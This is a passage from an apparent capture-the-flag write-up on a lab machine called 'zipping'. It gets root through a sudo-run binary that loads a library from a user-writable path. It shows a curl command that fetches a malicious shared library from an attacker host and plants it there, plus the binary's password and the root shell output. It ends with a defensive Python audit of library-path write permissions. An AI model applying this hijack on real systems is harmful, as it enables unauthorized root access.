Library Hijacking


According to the debugging, the custom binary, /usr/bin/stock, makes a system call to load a library: /home/rektsu/.config/libcounter.so. Since the current user is able to write to the directory, I will attempt to provide a malicious libcounter.so file to have the binary load it.

rektsu@zipping:/home/rektsu$ curl -s http://10.10.14.4/libcounter.so -o /home/rektsu/.config/libcounter.so ; chmod 777 /home/rektsu/.config/libcounter.so ; ll /home/rektsu/.config/libcounter.so
-rwxrwxrwx 1 rektsu rektsu 462 aug 30 16:08 /home/rektsu/.config/libcounter.so*

Delivering the payload and changing the permission bits for access

rektsu@zipping:/home/rektsu$ sudo -u root /usr/bin/stock
enter the password: 

It prompts for authentication. Providing the password here will make the system call to load the malicious shared object library that I planted earlier.

enter the password: St0ckM4nager
root@zipping:/home/rektsu# whoami
root
root@zipping:/home/rektsu# hostname
zipping
root@zipping:/home/rektsu# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.229  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:5009  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:5009  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:50:09  txqueuelen 1000  (Ethernet)
        RX packets 2349926  bytes 376400528 (376.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2423445  bytes 1127820947 (1.1 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 45261  bytes 3485914 (3.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 45261  bytes 3485914 (3.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise
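
The root cause above is a root-run binary loading a library from a path that a non-root account controls. The following audit check is an added example, not part of the original write-up; the function name `audit_library_path` and its parameters are hypothetical. It walks every component of a library path and reports who other than root could replace or create the file.

```python
import os
import stat

def audit_library_path(path, trusted_uids=(0,), trusted_gids=(0,)):
    """Return (component, reason) pairs for each way a non-trusted account
    could control the file at `path` (a library a privileged binary loads)."""
    real = os.path.realpath(path)  # resolve symlinks; works for missing files too
    components, current = [os.sep], os.sep
    for part in real.strip(os.sep).split(os.sep):
        current = os.path.join(current, part)
        components.append(current)

    findings = []
    for comp in components:
        try:
            st = os.stat(comp)
        except FileNotFoundError:
            # A missing library is not safe: whoever can write the parent
            # directory (audited in the previous iteration) can create it.
            findings.append((comp, "missing: creatable via parent directory"))
            break
        if st.st_uid not in trusted_uids:
            findings.append((comp, f"owned by uid {st.st_uid}"))
        if st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
            findings.append((comp, f"group-writable by gid {st.st_gid}"))
        if st.st_mode & stat.S_IWOTH:
            # Reported even for sticky directories such as /tmp (conservative).
            findings.append((comp, "world-writable"))
    return findings

if __name__ == "__main__":
    # Path taken from the write-up; on another host it will usually be missing.
    for comp, reason in audit_library_path("/home/rektsu/.config/libcounter.so"):
        print(f"{comp}: {reason}")
```

Any finding on a path that a sudo-permitted binary loads means the sudo rule effectively grants root to whoever owns or can write that component.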